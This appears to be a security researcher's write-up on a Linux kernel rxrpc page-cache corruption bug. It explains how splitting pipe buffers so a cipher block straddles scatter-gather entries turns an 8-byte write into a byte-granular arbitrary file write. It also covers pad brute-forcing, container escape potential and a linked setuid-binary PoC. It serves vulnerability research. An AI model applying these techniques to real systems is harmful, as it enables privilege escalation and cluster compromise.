Part I ended with a sentence that kept bugging me:
"Page-cache bugs were (are?) one of the best primitives... reliable, silent, resilient, and most of the time pretty hidden in the VM code."
The parenthetical resolved itself. The "are" quietly became a "were." Almost all of them are gone now. The patches landed. The embargo, the one with public patches (are you serious?) is over. New PoCs are floating around.
Read the new writeups, read the dirtyfrag analysis, and the 8-byte constraint stopped me cold. I was sure the constraint wasn't there: the write lands where the SGL says it lands, and the SGL is yours to shape. Went back to the source. Apart from some refactoring around io_thread.c, nothing had moved in the last years. The bug was the same bug. The constraint wasn't in it. It never was.
This is just a reflection about something that happens more often than we'd like to admit (and it has happened to me too so many times... sigh). You look at a codebase, you trace one path through it, and that path becomes the truth. A constraint that's really just an artifact of how someone built the pipe starts feeling like a law of physics. And somewhere in the source there's a function with a boring name that handles exactly the case you needed, and you never open it, because why would you? the constraint already made sense.
The constraint everyone accepted
The public writeup describes the primitive clearly. The exploit constructs a malicious packet by splicing 8 bytes of file data into a pipe, right after the 28-byte rxrpc wire header. When the packet hits the kernel, skb_to_sgvec() skips the header and produces a scatter-gather list with one entry: the file's page-cache page, 8 bytes long. skcipher_walk() sees one contiguous region equal to the fcrypt block size, takes the fast path, maps the page directly, decrypts in place, unmaps. Eight bytes of decrypted output overwrite eight bytes of someone else's file.
The writeup calls this an "8-byte STORE" and treats it as a fixed property of the primitive.
From the author's own words:
"To plant a desired 8 bytes, K such that this value drops out has to be brute forced in user-space, and the cost grows exponentially with the number of constrained plaintext bytes (when all 8 bytes are constrained, the key space reaches ~2⁵⁶, which is practically infeasible). For that reason, the ESP-style approach of writing a static 192-byte ELF as a whole into the /usr/bin/su page cache is impractical, and instead a target with very few bytes that need to be decided must be chosen."
It basically hits a wall: you can't control all 8 bytes without a 2^56 key search and pivots to a clever workaround with PAM configuration files, where you only need to control a few bytes. The PAM trick was genuinely clever - but the constraint it was designed to work around may not actually be there: splitting the scatter-gather list so that only one file byte lands inside the cipher block pushes skciper_walk() into its slow path, where it gathers across the boundary, decrypts, and scatters back just that single byte to the page cache, turning what looked like a 2^56 search into a few hundred iterations.
The cement sets fast
Here's what happened, and I say this with sympathy because I've done the exact same thing more times than I'd like to admit.
The exploit constructs the pipe like this:
pipe buffer 0: wire header (28 bytes) <-- vmsplice from uspace pipe buffer 1: file data (8 bytes) <-- splice from target
skb_to_sgvec skips 28 bytes of header, lands on the 8-byte file fragment. Single SGL entry. Single page. Fast path. Eight bytes decrypted in place, eight bytes corrupted.
This framing - "the cipher block IS the file data" became the load-bearing assumption. Every PoC reproduces it. It looks structural. It feels like a property of the cipher, or the crypto API, or sub_to_sgvec(). It isn't. It's a property of how the exploit constructs the pipe. That's it. That's the whole thing.
skb_to_sgvec() doesn't care about cipher blocks. It doesn't know the cipher exists. Here's the fragment loop:
for (i = 0; i < skb_shinfo(skb)->nr_frags; i++) { int end; end = start + skb_frag_size(&skb_shinfo(skb)->frags[i]); if ((copy = end - offset) > 0) { skb_frag_t *frag = &skb_shinfo(skb)->frags[i]; if (copy > len) copy = len; sg_set_page(&sg[elt], skb_frag_page(frag), copy, skb_frag_off(frag) + offset - start); elt++; if (!(len -= copy)) return elt; offset += copy; } start = end; }
One sg_set_page() per fragment, with whatever length that fragment has. One frag, one SGL entry. Two frags, two SGL entries. The crypto layer processes the SGL as a byte stream. If a cipher block spans two entries, skcipher_walk() handles it transparently.
The only question is: can the attacker control the fragment boundary within the 8-byte cipher block?
Each splice() into the pipe creates a separate pipe buffer. Each pipe buffer becomes a separate skb fragment when the pipe is spliced into the UDP socket. The attacker controls the boundary because the attacker controls the pipe operations.
The straddle
Instead of splicing 8 bytes of file data, split the payload across two pipe operations:
pipe buffer 0: wire header (28 bytes) <-- vmsplice from userspace pipe buffer 1: anon pad (7 bytes) <-- vmsplice from userspace pipe buffer 2: file data (1 byte) <-- splice from target file
Seven throwaway bytes. One file byte. Same total: 8 bytes, one cipher block. But now skb_to_sgvec(), that same loop above, produces:
SG-0: anon page, len=7 (the pad) SG-1: file page-cache, len=1 (the target byte)
The cipher block spans two SGL entries. This is the pivot.
The slow path
When the cipher block spans two SGL entries, skcipher_walk_next() sees that the first entry is shorter than the block size and drops into the bounce-buffer path. The interesting part is what happens on each side of the decrypt.
On the way in, memcpy_from_scatterwalk() pulls bytes across the boundary:
inline void memcpy_from_scatterwalk(void *buf, struct scatter_walk *walk, unsigned int nbytes) { do { unsigned int to_copy; to_copy = scatterwalk_next(walk, nbytes); memcpy(buf, walk->addr, to_copy); scatterwalk_done_src(walk, to_copy); buf += to_copy; nbytes -= to_copy; } while (nbytes); }
scatterwalk_next() returns 7: the remaining bytes in SG-0, our throwaway pad. Copies them. Advances to SG-1. Returns 1: the single file byte. Copies it. The bounce buffer now holds [[0xCC * 7 || file_byte]]. The cipher decrypts it in place. On the way out, skcipher_walk_done() calls the mirror function:
inline void memcpy_to_scatterwalk(struct scatter_walk *walk, const void *buf, unsigned int nbytes) { do { unsigned int to_copy; to_copy = scatterwalk_next(walk, nbytes); memcpy(walk->addr, buf, to_copy); scatterwalk_done_dst(walk, to_copy); buf += to_copy; nbytes -= to_copy; } while (nbytes); }
Same loop, reverse direction. Seven bytes of decrypted garbage go back to the anon page. Then scatterwalk_next() crosses into SG-1, returns 1, and that memcpy(walk->add, but, 1) writes one byte of attacker-chosen plaintext directly into the file's page-cache page.
That's the whole write. One memcpy(), one byte, into a page the attacker could only read.
The brute-force that isn't
It's not a brute-force anymore. That's the point.
With one constrained byte instead of eight, finding the right session key is a lookup, not a search. You iterate a few hundred keys, check if the last byte of the decrypted block matches your target, and move on. The whole thing completes in about 50 microseconds. Writing 8 arbitrary bytes into someone else's file takes 3–12 milliseconds end-to-end, including the rxrpc handshake, pipe construction, verification, and retry.
That's not a primitive with limitations you have to work around. That's just a write.
One key, many bytes
There's a practical problem with the approach as described: each byte write uses a different session key, which means a fresh add_key() call, a new rxrpc connection, a full handshake. Getting rid of a key is not as straightforward as it might seem. When embedding this into a container sibling attack you ends up consuming too many keys. On many systems keys are rate-limited - the kernel enforces per-user key quotas (/proc/sys/kernel/keys/maxkeys), and even where the quota is generous, each call is a trip through the keyring subsystem with its own locking overhead.
The fix is obvious once you stop thinking of the key as the variable.
We chose the pad. We chose the key. We know the file byte. The ciphertext block the kernel will decrypt is [[pad[0..6] || orig_byte]], and the output is fcrypt_decrypt(K, cipertext). We've been varying K to make output byte 7 hit our target. But K isn't the only free variable. The pad is too, and we control it entirely from userland via vmsplice, no multiple key, no connection teardown.
Fix the key once. For each byte you want to write, brute-force the pad instead.
Varying a single pad byte gives 256 possibilities. Same expected cost as the key search, ~256 iterations, but the key schedule is already done. And since the key doesn't change, the rxrpc connection stays up. One add_key(), one handshake, then write as many bytes as you want by varying the pad in each vmsplice. The keyring quota becomes irrelevant.
The whole exploit reduces to one key, one connection, N packets. On a system where add_key() is watched, logged, or throttled, the difference is huge.
Where this actually lands
Now the primitive may work inside containers: not just for local privilege escalation between users on the same host, but for sibling injection across pods and, in the right configurations, escape to the host. It is not as straightforward as the AF_ALG primitive but it not that contained. That's a different conversation entirely. Granted, the rxrpc module isn't loaded everywhere: Ubuntu and a handful of others ship it, most don't. But where it is, the impact isn't "unprivileged user becomes root." It is "compromised pod may become your cluster." Bit of a difference.
The PoC for the rxrpc byte-granular write to setuid binaries is at https://github.com/sgkdev/rxrpc_privesc - integration into page_inject will follow.